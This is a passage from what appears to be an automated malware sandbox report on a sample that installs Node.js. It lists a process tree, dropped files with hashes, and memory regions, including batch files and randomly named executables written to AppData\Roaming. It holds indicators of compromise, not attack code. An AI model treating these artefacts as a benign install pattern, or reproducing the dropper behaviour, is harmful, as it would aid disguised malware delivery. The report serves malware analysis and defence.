                                                                                                                                            PID:3328
                                                                                                                                            • C:\Windows\System32\MsiExec.exe
                                                                                                                                              C:\Windows\System32\MsiExec.exe -Embedding C523729FD9003361DD6D42A54D619F30
                                                                                                                                              2⤵
                                                                                                                                              • Loads dropped DLL
                                                                                                                                              PID:2984
                                                                                                                                            • C:\Windows\System32\MsiExec.exe
                                                                                                                                              C:\Windows\System32\MsiExec.exe -Embedding 5792A1FAB920D38F87F6A04108A52C8A E Global\MSI0000
                                                                                                                                              2⤵
                                                                                                                                              • Loads dropped DLL
                                                                                                                                              PID:4416
                                                                                                                                            • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                              C:\Windows\syswow64\MsiExec.exe -Embedding 8620856E868D0B5B6FFD33BA99521555
                                                                                                                                              2⤵
                                                                                                                                              • Loads dropped DLL
                                                                                                                                              PID:3576
                                                                                                                                          • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                                                            "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                                                                                                                            1⤵
                                                                                                                                              PID:1152
                                                                                                                                            • C:\Windows\system32\DllHost.exe
                                                                                                                                              C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                                              1⤵
                                                                                                                                                PID:4792
                                                                                                                                              • C:\Windows\system32\BackgroundTransferHost.exe
                                                                                                                                                "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
                                                                                                                                                1⤵
                                                                                                                                                  PID:3672

                                                                                                                                                Network

                                                                                                                                                MITRE ATT&CK Matrix

                                                                                                                                                Replay Monitor

                                                                                                                                                Loading Replay Monitor...

                                                                                                                                                Downloads

                                                                                                                                                • C:\Config.Msi\e58d501.rbs
                                                                                                                                                  Filesize

                                                                                                                                                  823KB

                                                                                                                                                  MD5

                                                                                                                                                  780027e2c95b38232c08368297b2bc06

                                                                                                                                                  SHA1

                                                                                                                                                  13468ae4027708f8700278b9dc300f9971ba8b01

                                                                                                                                                  SHA256

                                                                                                                                                  35d1fd76e82db67de8065737ba94a63c2b03a65d13dc36522d946391e3a2ce8d

                                                                                                                                                  SHA512

                                                                                                                                                  bfd4d4903e12aa0ebfe041aa0eecf096146a24957dfa80add73167f02b7dff258c4bc087353f2fdbd3f148f262926871a0f26462b3e244cb8953a7c7121ddc7c

                                                                                                                                                • C:\Program Files\nodejs\node_modules\npm\node_modules\@sigstore\tuf\LICENSE
                                                                                                                                                  Filesize

                                                                                                                                                  11KB

                                                                                                                                                  MD5

                                                                                                                                                  dfc1b916d4555a69859202f8bd8ad40c

                                                                                                                                                  SHA1

                                                                                                                                                  fc22b6ee39814d22e77fe6386c883a58ecac6465

                                                                                                                                                  SHA256

                                                                                                                                                  7b0ce3425a26fdba501cb13508af096ade77e4036dd2bd8849031ddecf64f7c9

                                                                                                                                                  SHA512

                                                                                                                                                  1fbe6bb1f60c8932e4dcb927fc8c8131b9c73afd824ecbabc2045e7af07b35a4155a0f8ad3103bf25f192b6d59282bfc927aead3cb7aaeb954e1b6dbd68369fa

                                                                                                                                                • C:\Program Files\nodejs\node_modules\npm\node_modules\@sigstore\verify\dist\shared.types.js
                                                                                                                                                  Filesize

                                                                                                                                                  79B

                                                                                                                                                  MD5

                                                                                                                                                  24563705cc4bb54fccd88e52bc96c711

                                                                                                                                                  SHA1

                                                                                                                                                  871fa42907b821246de04785a532297500372fc7

                                                                                                                                                  SHA256

                                                                                                                                                  ef1f170ad28f2d870a474d2f96ae353d770fff5f20e642cd8f9b6f1d7742df13

                                                                                                                                                  SHA512

                                                                                                                                                  2ce8d2cf580623358fef5f4f8925d0c9943a657c2503c80048ca789bf16eacdb980bfc8aaaa50101a738e939926fcf2545500484dcad782c700ee206d8c6f9b9

                                                                                                                                                • C:\Program Files\nodejs\node_modules\npm\node_modules\bin-links\LICENSE
                                                                                                                                                  Filesize

                                                                                                                                                  754B

                                                                                                                                                  MD5

                                                                                                                                                  d2cf52aa43e18fdc87562d4c1303f46a

                                                                                                                                                  SHA1

                                                                                                                                                  58fb4a65fffb438630351e7cafd322579817e5e1

                                                                                                                                                  SHA256

                                                                                                                                                  45e433413760dc3ae8169be5ed9c2c77adc31ad4d1bc5a28939576df240f29a0

                                                                                                                                                  SHA512

                                                                                                                                                  54e33d7998b5e9ba76b2c852b4d0493ebb1b1ee3db777c97e6606655325ff66124a0c0857ca4d62de96350dbaee8d20604ec22b0edc17b472086da4babbbcb16

                                                                                                                                                • C:\Program Files\nodejs\node_modules\npm\node_modules\chalk\license
                                                                                                                                                  Filesize

                                                                                                                                                  1KB

                                                                                                                                                  MD5

                                                                                                                                                  b862aeb7e1d01452e0f07403591e5a55

                                                                                                                                                  SHA1

                                                                                                                                                  b8765be74fea9525d978661759be8c11bab5e60e

                                                                                                                                                  SHA256

                                                                                                                                                  fcf1a18be2e25ba82acf2c59821b030d8ee764e4e201db6ef3c51900d385515f

                                                                                                                                                  SHA512

                                                                                                                                                  885369fe9b8cb0af1107ee92b52c6a353da7cf75bc86abb622e2b637c81e9c5ffe36b0ac74e11cfb66a7a126b606fe7a27e91f3f4338954c847ed2280af76a5f

                                                                                                                                                • C:\Program Files\nodejs\node_modules\npm\node_modules\env-paths\license
                                                                                                                                                  Filesize

                                                                                                                                                  1KB

                                                                                                                                                  MD5

                                                                                                                                                  5ad87d95c13094fa67f25442ff521efd

                                                                                                                                                  SHA1

                                                                                                                                                  01f1438a98e1b796e05a74131e6bb9d66c9e8542

                                                                                                                                                  SHA256

                                                                                                                                                  67292c32894c8ac99db06ffa1cb8e9a5171ef988120723ebe673bf76712260ec

                                                                                                                                                  SHA512

                                                                                                                                                  7187720ccd335a10c9698f8493d6caa2d404e7b21731009de5f0da51ad5b9604645fbf4bc640aa94513b9eb372aa6a31df2467198989234bc2afbce87f76fbc3

                                                                                                                                                • C:\Program Files\nodejs\node_modules\npm\node_modules\gauge\LICENSE.md
                                                                                                                                                  Filesize

                                                                                                                                                  818B

                                                                                                                                                  MD5

                                                                                                                                                  2916d8b51a5cc0a350d64389bc07aef6

                                                                                                                                                  SHA1

                                                                                                                                                  c9d5ac416c1dd7945651bee712dbed4d158d09e1

                                                                                                                                                  SHA256

                                                                                                                                                  733dcbf5b1c95dc765b76db969b998ce0cbb26f01be2e55e7bccd6c7af29cb04

                                                                                                                                                  SHA512

                                                                                                                                                  508c5d1842968c478e6b42b94e04e0b53a342dfaf52d55882fdcfe02c98186e9701983ab5e9726259fba8336282e20126c70d04fc57964027586a40e96c56b74

                                                                                                                                                • C:\Program Files\nodejs\node_modules\npm\node_modules\ignore-walk\LICENSE
                                                                                                                                                  Filesize

                                                                                                                                                  780B

                                                                                                                                                  MD5

                                                                                                                                                  b020de8f88eacc104c21d6e6cacc636d

                                                                                                                                                  SHA1

                                                                                                                                                  20b35e641e3a5ea25f012e13d69fab37e3d68d6b

                                                                                                                                                  SHA256

                                                                                                                                                  3f24d692d165989cd9a00fe35ca15a2bc6859e3361fa42aa20babd435f2e4706

                                                                                                                                                  SHA512

                                                                                                                                                  4220617e29dd755ad592295bc074d6bc14d44a1feeed5101129669f3ecf0e34eaa4c7c96bbc83da7352631fa262baab45d4a370dad7dabec52b66f1720c28e38

                                                                                                                                                • C:\Program Files\nodejs\node_modules\npm\node_modules\libnpmsearch\LICENSE
                                                                                                                                                  Filesize

                                                                                                                                                  730B

                                                                                                                                                  MD5

                                                                                                                                                  072ac9ab0c4667f8f876becedfe10ee0

                                                                                                                                                  SHA1

                                                                                                                                                  0227492dcdc7fb8de1d14f9d3421c333230cf8fe

                                                                                                                                                  SHA256

                                                                                                                                                  2ef361317adeda98117f14c5110182c28eae233af1f7050c83d4396961d14013

                                                                                                                                                  SHA512

                                                                                                                                                  f38fd6506bd9795bb27d31f1ce38b08c9e6f1689c34fca90e9e1d5194fa064d1f34a9c51d15941506ebbbcd6d4193055e9664892521b7e39ebcd61c3b6f25013

                                                                                                                                                • C:\Program Files\nodejs\node_modules\npm\node_modules\minizlib\node_modules\minipass\LICENSE
                                                                                                                                                  Filesize

                                                                                                                                                  802B

                                                                                                                                                  MD5

                                                                                                                                                  d7c8fab641cd22d2cd30d2999cc77040

                                                                                                                                                  SHA1

                                                                                                                                                  d293601583b1454ad5415260e4378217d569538e

                                                                                                                                                  SHA256

                                                                                                                                                  04400db77d925de5b0264f6db5b44fe6f8b94f9419ad3473caaa8065c525c0be

                                                                                                                                                  SHA512

                                                                                                                                                  278ff929904be0c19ee5fb836f205e3e5b3e7cec3d26dd42bbf1e7e0ca891bf9c42d2b28fce3741ae92e4a924baf7490c7c6c59284127081015a82e2653e0764

                                                                                                                                                • C:\Program Files\nodejs\node_modules\npm\node_modules\minizlib\node_modules\minipass\index.js
                                                                                                                                                  Filesize

                                                                                                                                                  16KB

                                                                                                                                                  MD5

                                                                                                                                                  bc0c0eeede037aa152345ab1f9774e92

                                                                                                                                                  SHA1

                                                                                                                                                  56e0f71900f0ef8294e46757ec14c0c11ed31d4e

                                                                                                                                                  SHA256

                                                                                                                                                  7a395802fbe01bb3dc8d09586e0864f255874bf897378e546444fbaec29f54c5

                                                                                                                                                  SHA512

                                                                                                                                                  5f31251825554bf9ed99eda282fa1973fcec4a078796a10757f4fb5592f2783c4ebdd00bdf0d7ed30f82f54a7668446a372039e9d4589db52a75060ca82186b3

                                                                                                                                                • C:\Program Files\nodejs\node_modules\npm\node_modules\minizlib\node_modules\minipass\package.json
                                                                                                                                                  Filesize

                                                                                                                                                  1KB

                                                                                                                                                  MD5

                                                                                                                                                  d116a360376e31950428ed26eae9ffd4

                                                                                                                                                  SHA1

                                                                                                                                                  192b8e06fb4e1f97e5c5c7bf62a9bff7704c198b

                                                                                                                                                  SHA256

                                                                                                                                                  c3052bd85910be313e38ad355528d527b565e70ef15a784db3279649eee2ded5

                                                                                                                                                  SHA512

                                                                                                                                                  5221c7648f4299234a4637c47d3f1eb5e147014704913bc6fdad91b9b6a6ccc109bced63376b82b046bb5cad708464c76fb452365b76dbf53161914acf8fb11a

                                                                                                                                                • C:\Program Files\nodejs\node_modules\npm\node_modules\promise-call-limit\LICENSE
                                                                                                                                                  Filesize

                                                                                                                                                  763B

                                                                                                                                                  MD5

                                                                                                                                                  7428aa9f83c500c4a434f8848ee23851

                                                                                                                                                  SHA1

                                                                                                                                                  166b3e1c1b7d7cb7b070108876492529f546219f

                                                                                                                                                  SHA256

                                                                                                                                                  1fccd0ad2e7e0e31ddfadeaf0660d7318947b425324645aa85afd7227cab52d7

                                                                                                                                                  SHA512

                                                                                                                                                  c7f01de85f0660560206784cdf159b2bdc5f1bc87131f5a8edf384eba47a113005491520b0a25d3cc425985b5def7b189e18ff76d7d562c434dc5d8c82e90cce

                                                                                                                                                • C:\Program Files\nodejs\node_modules\npm\node_modules\promise-call-limit\dist\commonjs\package.json
                                                                                                                                                  Filesize

                                                                                                                                                  28B

                                                                                                                                                  MD5

                                                                                                                                                  56368b3e2b84dac2c9ed38b5c4329ec2

                                                                                                                                                  SHA1

                                                                                                                                                  f67c4acef5973c256c47998b20b5165ab7629ed4

                                                                                                                                                  SHA256

                                                                                                                                                  58b55392b5778941e1e96892a70edc12e2d7bb8541289b237fbddc9926ed51bd

                                                                                                                                                  SHA512

                                                                                                                                                  d662bff3885118e607079fcbeedb27368589bc0ee89f90b9281723fa08bda65e5a08d9640da188773193c0076ec0a5c92624673a6a961490be163e2553d6f482

                                                                                                                                                • C:\Program Files\nodejs\node_modules\npm\node_modules\promise-call-limit\dist\esm\package.json
                                                                                                                                                  Filesize

                                                                                                                                                  26B

                                                                                                                                                  MD5

                                                                                                                                                  2324363c71f28a5b7e946a38dc2d9293

                                                                                                                                                  SHA1

                                                                                                                                                  7eda542849fb3a4a7b4ba8a7745887adcade1673

                                                                                                                                                  SHA256

                                                                                                                                                  1bf0e53fc74b05f1aade7451fbac72f1944b067d4229d96bae7a225519a250e4

                                                                                                                                                  SHA512

                                                                                                                                                  7437cf8f337d2562a4046246fbfcc5e9949f475a1435e94efbc4b6a55880050077d72692cbc3413e0ccd8f36adf9956a6cc633a2adc85fbff6c4aa2b8edac677

                                                                                                                                                • C:\Program Files\nodejs\node_modules\npm\node_modules\wrap-ansi\node_modules\emoji-regex\es2015\index.js
                                                                                                                                                  Filesize

                                                                                                                                                  17KB

                                                                                                                                                  MD5

                                                                                                                                                  cf8f16c1aa805000c832f879529c070c

                                                                                                                                                  SHA1

                                                                                                                                                  54cc4d6c9b462ad2de246e28cd80ed030504353d

                                                                                                                                                  SHA256

                                                                                                                                                  77f404d608e2a98f2a038a8aa91b83f0a6e3b4937e5de35a8dae0c23aa9ee573

                                                                                                                                                  SHA512

                                                                                                                                                  a786e51af862470ae46ad085d33281e45795c24897e64b2c4b265302fa9cbfa47b262ec188adbc80d51cfc6ba395b500c0d7f5d343ca4fc2b828eaedba4bd29a

                                                                                                                                                • C:\Program Files\nodejs\node_modules\npm\node_modules\wrap-ansi\node_modules\emoji-regex\index.js
                                                                                                                                                  Filesize

                                                                                                                                                  15KB

                                                                                                                                                  MD5

                                                                                                                                                  9841536310d4e186a474dfa2acf558cd

                                                                                                                                                  SHA1

                                                                                                                                                  33fabbcc5e1adbe0528243eafd36e5d876aaecaa

                                                                                                                                                  SHA256

                                                                                                                                                  5b3c0ac6483d83e6c079f9ffd1c7a18e883a9aaeaedb2d65dd9d5f78153476b9

                                                                                                                                                  SHA512

                                                                                                                                                  b67680a81bb4b62f959ba66476723eb681614925f556689e4d7240af8216a49f0d994c31381bf6a9489151d14ed8e0d0d4d28b66f02f31188059c9b24aaa3783

                                                                                                                                                • C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Node.js\Install Additional Tools for Node.js.lnk
                                                                                                                                                  Filesize

                                                                                                                                                  982B

                                                                                                                                                  MD5

                                                                                                                                                  cd0b03649063a07e1eebc429be0c065c

                                                                                                                                                  SHA1

                                                                                                                                                  f01499e24476a3ab1224515e37f884e876a3052b

                                                                                                                                                  SHA256

                                                                                                                                                  c433b96214615745bb1d691181fc23d6ca0addb4539cc6e12ae9ca5ff3b51e37

                                                                                                                                                  SHA512

                                                                                                                                                  9c5f384c8cdf3dd75bcdf3b7e6764f4eb38e62238183bd625ab7b45caa3dceba8aef8ef58316c5acda578cd906a3d28f370b91d45ad8ca5665fa30955c990b8e

                                                                                                                                                • C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Node.js\Node.js command prompt.lnk
                                                                                                                                                  Filesize

                                                                                                                                                  966B

                                                                                                                                                  MD5

                                                                                                                                                  9d706d02c03abe2e336a0574c78c2209

                                                                                                                                                  SHA1

                                                                                                                                                  0a3cee090319ef8a16ba2df5a7b43125afec7f54

                                                                                                                                                  SHA256

                                                                                                                                                  b8fc7854574d2aae7597b3f678ba183d207d2d1de1d48cf9eb6175130de26afa

                                                                                                                                                  SHA512

                                                                                                                                                  827501c9e9436b499be8db4db599a261773948c11e7067966b16ad134b5677cb5be0c8471fcdac35526e6c3d707fe2bf9e8c00dfc925861f1beac77d575dac38

                                                                                                                                                • C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Node.js\Node.js documentation.url
                                                                                                                                                  Filesize

                                                                                                                                                  168B

                                                                                                                                                  MD5

                                                                                                                                                  1c1f6159630c170b596af7c9085f8bb0

                                                                                                                                                  SHA1

                                                                                                                                                  ac26cfe43e10a9f76aee943f9ceff3dc77df29fd

                                                                                                                                                  SHA256

                                                                                                                                                  61403502b3d584ab749a417955dda3d6c956e64109cc4ac4e46e44b462b7c4f0

                                                                                                                                                  SHA512

                                                                                                                                                  f93d2e86c287ed4e50a0c00bcd9594c322cfbd0507bbd191d97c7dd2881850296986139df9580ba1bbaae8abab284335db64c41f6edde441e34fa56b934c3046

                                                                                                                                                • C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Node.js\Node.js website.url
                                                                                                                                                  Filesize

                                                                                                                                                  133B

                                                                                                                                                  MD5

                                                                                                                                                  35b86e177ab52108bd9fed7425a9e34a

                                                                                                                                                  SHA1

                                                                                                                                                  76a1f47a10e3ab829f676838147875d75022c70c

                                                                                                                                                  SHA256

                                                                                                                                                  afaa6c6335bd3db79e46fb9d4d54d893cee9288e6bb4738294806a9751657319

                                                                                                                                                  SHA512

                                                                                                                                                  3c8047c94b789c8496af3c2502896cef2d348ee31618893b9b71244af667ec291dcb9b840f869eb984624660086db0c848d1846aa601893e6f9955e56da19f62

                                                                                                                                                • C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Node.js\Node.js.lnk
                                                                                                                                                  Filesize

                                                                                                                                                  949B

                                                                                                                                                  MD5

                                                                                                                                                  fb34e285406e9ef59fc3943c65aeba10

                                                                                                                                                  SHA1

                                                                                                                                                  96a2e06ef751aa885978f807d18b3d25ba37c315

                                                                                                                                                  SHA256

                                                                                                                                                  d9f0faf877ab17770c17c25e79468a8051363c1665e9e764731dba844e788a52

                                                                                                                                                  SHA512

                                                                                                                                                  8cc9437c176e00a759b71aa31d467f9b8f20a48861e9f727e0d5a01d729b488f6dcb3e6846481ef336af26774cf94169b9c50c8544961f6379c1ba174b63c98e

                                                                                                                                                • C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Node.js\Uninstall Node.js.lnk
                                                                                                                                                  Filesize

                                                                                                                                                  940B

                                                                                                                                                  MD5

                                                                                                                                                  f92e080eba80877a58b04e9ec74f3729

                                                                                                                                                  SHA1

                                                                                                                                                  536858f6073bd26d7012ba216f093227f91cd5ce

                                                                                                                                                  SHA256

                                                                                                                                                  201fab651cfb57fdf44524b3f18df9a9a2e931c3cc5f8a1e6f203b1c37bce6ed

                                                                                                                                                  SHA512

                                                                                                                                                  b621b5f9614e73ea893e05f944a614508ac31c77ddaee2f81f59527f28b72956ade6f15137f7e1c5c93056a925978ea1726be79c1d67e89b303a9dd4cb5ea8fc

                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                                                                                                                                  Filesize

                                                                                                                                                  3KB

                                                                                                                                                  MD5

                                                                                                                                                  556084f2c6d459c116a69d6fedcc4105

                                                                                                                                                  SHA1

                                                                                                                                                  633e89b9a1e77942d822d14de6708430a3944dbc

                                                                                                                                                  SHA256

                                                                                                                                                  88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

                                                                                                                                                  SHA512

                                                                                                                                                  0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                                  Filesize

                                                                                                                                                  1KB

                                                                                                                                                  MD5

                                                                                                                                                  c20ac38ae3022e305b8752804aadf486

                                                                                                                                                  SHA1

                                                                                                                                                  4c144d6cfafb5c37ab4810ff3c1744df81493cdb

                                                                                                                                                  SHA256

                                                                                                                                                  03cba7e903a418a3966af1dc0debfb5fcfb2ac6d372ec48cb1b93c23e0fd1caf

                                                                                                                                                  SHA512

                                                                                                                                                  c9def9e5cd09d19b8b47a3f4c61893da715a6ba4b9933c885386d0425ee4ccc30d75eac1097511619d4e6259a46581f803fb38f78a15339391e4e78b0b6153e0

                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                                  Filesize

                                                                                                                                                  1KB

                                                                                                                                                  MD5

                                                                                                                                                  2d74f3420d97c3324b6032942f3a9fa7

                                                                                                                                                  SHA1

                                                                                                                                                  95af9f165ffc370c5d654a39d959a8c4231122b9

                                                                                                                                                  SHA256

                                                                                                                                                  8937b96201864340f7fae727ff0339d0da2ad23c822774ff8ff25afa2ae4da3d

                                                                                                                                                  SHA512

                                                                                                                                                  3c3d2ae3b2581ff32cfee2aedca706e4eaa111a1f9baeb9f022762f7ef2dfb6734938c39eb17974873ad01a4760889e81a7b45d7ed404eb5830f73eb23737f1a

                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\34C7.tmp\34C8.tmp\34C9.bat
                                                                                                                                                  Filesize

                                                                                                                                                  6KB

                                                                                                                                                  MD5

                                                                                                                                                  45f6bf2d3c1c47e445439b805929aae8

                                                                                                                                                  SHA1

                                                                                                                                                  9d2ba518dd058559bc1d690019bbed79c7cd5f85

                                                                                                                                                  SHA256

                                                                                                                                                  ca7484221dd9645e4608a8195965d941955cfb0f9a373d0870cfd244302ae0fa

                                                                                                                                                  SHA512

                                                                                                                                                  902eb3e38b0be7d795f17a779d0231d0d168fbb8d4ce32b48ba3774a6be9929016b213e9b0082b55e8ac4d2fadadce3184ba8c30f8a025003fec8c8b8e496c64

                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\3544.tmp\3545.tmp\3546.bat
                                                                                                                                                  Filesize

                                                                                                                                                  1KB

                                                                                                                                                  MD5

                                                                                                                                                  2b49f09f8e1785bf2e5c79d0f2bc7389

                                                                                                                                                  SHA1

                                                                                                                                                  05d68482ab1db17e11fef25fae270c3b784000ae

                                                                                                                                                  SHA256

                                                                                                                                                  706536e5077fcb4e5e4dd2f77d40f492e7ab6b12065cdc0b450fdd483f436279

                                                                                                                                                  SHA512

                                                                                                                                                  ba8cc161086caa5beb691191ff10f1408e68be79a075d0a653716df497cec762b7767783a0dc91bcba2f260df0fa9ff77e9cf982a364135a18c281e50564bc0a

                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\3544.tmp\nodejs-installer.msi
                                                                                                                                                  Filesize

                                                                                                                                                  25.3MB

                                                                                                                                                  MD5

                                                                                                                                                  0df081aa47e7159e585488a161a97466

                                                                                                                                                  SHA1

                                                                                                                                                  2dc9a592dbb208624aff11a57f97bea89a315973

                                                                                                                                                  SHA256

                                                                                                                                                  20c578361911d7b0cf153b293b025970eca383a2c802e0df438ac254aaca165d

                                                                                                                                                  SHA512

                                                                                                                                                  2e1b58add6a714281f2ddeb936069c0eb8ce24ae2e440941379c4273afd7f1a96b162d5b88211e8678804bad652e48c99a4993e0e0d0da4d1abd7550d397e836

                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4xhdm4s1.0uv.ps1
                                                                                                                                                  Filesize

                                                                                                                                                  60B

                                                                                                                                                  MD5

                                                                                                                                                  d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                                  SHA1

                                                                                                                                                  6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                                  SHA256

                                                                                                                                                  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                                  SHA512

                                                                                                                                                  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                                • C:\Users\Admin\AppData\Roaming\n5nv3nld.2tb0.exe
                                                                                                                                                  Filesize

                                                                                                                                                  94KB

                                                                                                                                                  MD5

                                                                                                                                                  40208a80f2b2155185d8a5bac4b9c367

                                                                                                                                                  SHA1

                                                                                                                                                  d7bf694f6046be8d6a882c86df12c1a35e26ab60

                                                                                                                                                  SHA256

                                                                                                                                                  cf879d5a689376a47310ceb1b95167ccd18ab2073a1356b8d9cecbf04141ae16

                                                                                                                                                  SHA512

                                                                                                                                                  5ff32150c9e62261732c36b4bf2c4f84c58b120b72652b2c22a7591865dd6babbfb741fb75177acd845b072a4ea2a594960a894a2bca4f220c2f897ccd692621

                                                                                                                                                • C:\Users\Admin\AppData\Roaming\n5nv3nld.2tb1.exe
                                                                                                                                                  Filesize

                                                                                                                                                  423KB

                                                                                                                                                  MD5

                                                                                                                                                  448e72d5b4a0ab039607cbaf93707732

                                                                                                                                                  SHA1

                                                                                                                                                  bbb85f7a6b8915d6a6739aa4f80be2766c62eb9f

                                                                                                                                                  SHA256

                                                                                                                                                  df97eb504ed5a3298737f83d418d70025f3be0daf56d6ccae35ec0d2ef813b20

                                                                                                                                                  SHA512

                                                                                                                                                  a4f82bb6385e1259e082128604e4232e2f0f3436d8fa8aa04ce3b0d42c943b8b3da4ffb74e307ba7243801b5b48ca07848cc8d029fc8a36cfb90e50ebaaba6a4

                                                                                                                                                • C:\Users\Admin\AppData\Roaming\n5nv3nld.2tb2.exe
                                                                                                                                                  Filesize

                                                                                                                                                  5.2MB

                                                                                                                                                  MD5

                                                                                                                                                  f55fc8c32bee8f7b2253298f0a0012ba

                                                                                                                                                  SHA1

                                                                                                                                                  574c7a8f3eb378c03f58bc96252769296b20970e

                                                                                                                                                  SHA256

                                                                                                                                                  cf3389f2b5fb30f790542cd05deb5cb3b9bb10f828b8822cce1c0b83da9d6eb9

                                                                                                                                                  SHA512

                                                                                                                                                  c956fb150b34d3928eed545644cbf7914e7db3b079d4f260b9f40bf62aaf4432b4cdfd32c99abc9cd7ca79e66d0751d4a30c47087c39a38865b69dc877ac8f2a

                                                                                                                                                • C:\Users\Admin\AppData\Roaming\n5nv3nld.2tb3.exe
                                                                                                                                                  Filesize

                                                                                                                                                  89KB

                                                                                                                                                  MD5

                                                                                                                                                  a3b2fcf0c05bb385115894d38c2e6c44

                                                                                                                                                  SHA1

                                                                                                                                                  32cf50911381bbec1dad6aec06c2a741bd5d8213

                                                                                                                                                  SHA256

                                                                                                                                                  dbfe02373aa15cc50414561f2bf486b69a11cd9cd50217608c1d18d17e72cae1

                                                                                                                                                  SHA512

                                                                                                                                                  fe58a5d238ac39a269897c176de08d0ad2726bb2ea1636f0d383a1484263e43d0878f0b5f4ebee8a10f3db8e72ab9b36b861e29a6a9b6429fa3e51ec7546dee2

                                                                                                                                                • C:\Windows\Installer\MSI35A3.tmp
                                                                                                                                                  Filesize

                                                                                                                                                  341KB

                                                                                                                                                  MD5

                                                                                                                                                  74528af81c94087506cebcf38eeab4bc

                                                                                                                                                  SHA1

                                                                                                                                                  20c0ddfa620f9778e9053bd721d8f51c330b5202

                                                                                                                                                  SHA256

                                                                                                                                                  2650b77afbbc1faacc91e20a08a89fc2756b9db702a8689d3cc92aa163919b34

                                                                                                                                                  SHA512

                                                                                                                                                  9ce76594f64ea5969fff3becf3ca239b41fc6295bb3abf8e95f04f4209bb5ccddd09c76f69e1d3986a9fe16b4f0628e4a5c51e2d2edf3c60205758c40da04dae

                                                                                                                                                • C:\Windows\Installer\MSID906.tmp
                                                                                                                                                  Filesize

                                                                                                                                                  125KB

                                                                                                                                                  MD5

                                                                                                                                                  a6c7f0c329b28edb3e7f10d115d85c6d

                                                                                                                                                  SHA1

                                                                                                                                                  f36faaf4af452ab0bcd30ef66de7291bcee21264

                                                                                                                                                  SHA256

                                                                                                                                                  8f2e81c6f8ccd01dd1727cf93b82fe35b3abb8cf1ef3045dcd6cdf3346a59d03

                                                                                                                                                  SHA512

                                                                                                                                                  d7fb6997c9ff0dae74634422b8953a276604c0aa27b1e8d9ce4c87220fd469c6eecac6d86da857ff75378c535d2a684b4a120927c62f5267f1bd4dbdc05a72cf

                                                                                                                                                • C:\Windows\Installer\MSID946.tmp
                                                                                                                                                  Filesize

                                                                                                                                                  390KB

                                                                                                                                                  MD5

                                                                                                                                                  80bebea11fbe87108b08762a1bbff2cd

                                                                                                                                                  SHA1

                                                                                                                                                  a7ec111a792fd9a870841be430d130a545613782

                                                                                                                                                  SHA256

                                                                                                                                                  facf518f88cd67afd959c99c3ba233f78a4fbfe7fd3565489da74a585b55e9d1

                                                                                                                                                  SHA512

                                                                                                                                                  a760debb2084d801b6381a0e1dcef66080df03a768cc577b20b8472be87ad8477d59c331159555de10182d87340aa68fe1f3f5d0212048fd7692d85f4da656f6

                                                                                                                                                • memory/384-130-0x00007FFA4DAF0000-0x00007FFA4DB00000-memory.dmp
                                                                                                                                                  Filesize

                                                                                                                                                  64KB

                                                                                                                                                • memory/384-129-0x000002022A980000-0x000002022A9AB000-memory.dmp
                                                                                                                                                  Filesize

                                                                                                                                                  172KB

                                                                                                                                                • memory/624-127-0x00007FFA4DAF0000-0x00007FFA4DB00000-memory.dmp
                                                                                                                                                  Filesize

                                                                                                                                                  64KB

                                                                                                                                                • memory/624-126-0x0000017B91D90000-0x0000017B91DBB000-memory.dmp
                                                                                                                                                  Filesize

                                                                                                                                                  172KB

                                                                                                                                                • memory/624-122-0x0000017B91D60000-0x0000017B91D84000-memory.dmp
                                                                                                                                                  Filesize

                                                                                                                                                  144KB

                                                                                                                                                • memory/676-133-0x0000025A9D6D0000-0x0000025A9D6FB000-memory.dmp
                                                                                                                                                  Filesize

                                                                                                                                                  172KB

                                                                                                                                                • memory/676-134-0x00007FFA4DAF0000-0x00007FFA4DB00000-memory.dmp
                                                                                                                                                  Filesize

                                                                                                                                                  64KB

                                                                                                                                                • memory/1448-0-0x00007FFA6F913000-0x00007FFA6F915000-memory.dmp
                                                                                                                                                  Filesize

                                                                                                                                                  8KB

                                                                                                                                                • memory/1448-1-0x0000000000D00000-0x0000000000D08000-memory.dmp
                                                                                                                                                  Filesize

                                                                                                                                                  32KB

                                                                                                                                                • memory/2332-94-0x00000000006F0000-0x000000000076E000-memory.dmp
                                                                                                                                                  Filesize

                                                                                                                                                  504KB

                                                                                                                                                • memory/2332-49-0x00000000006F0000-0x000000000076E000-memory.dmp
                                                                                                                                                  Filesize

                                                                                                                                                  504KB

                                                                                                                                                • memory/2332-92-0x00000000771F0000-0x0000000077405000-memory.dmp
                                                                                                                                                  Filesize

                                                                                                                                                  2.1MB

                                                                                                                                                • memory/2332-90-0x00007FFA8DA70000-0x00007FFA8DC65000-memory.dmp
                                                                                                                                                  Filesize

                                                                                                                                                  2.0MB

                                                                                                                                                • memory/2332-89-0x0000000003430000-0x0000000003830000-memory.dmp
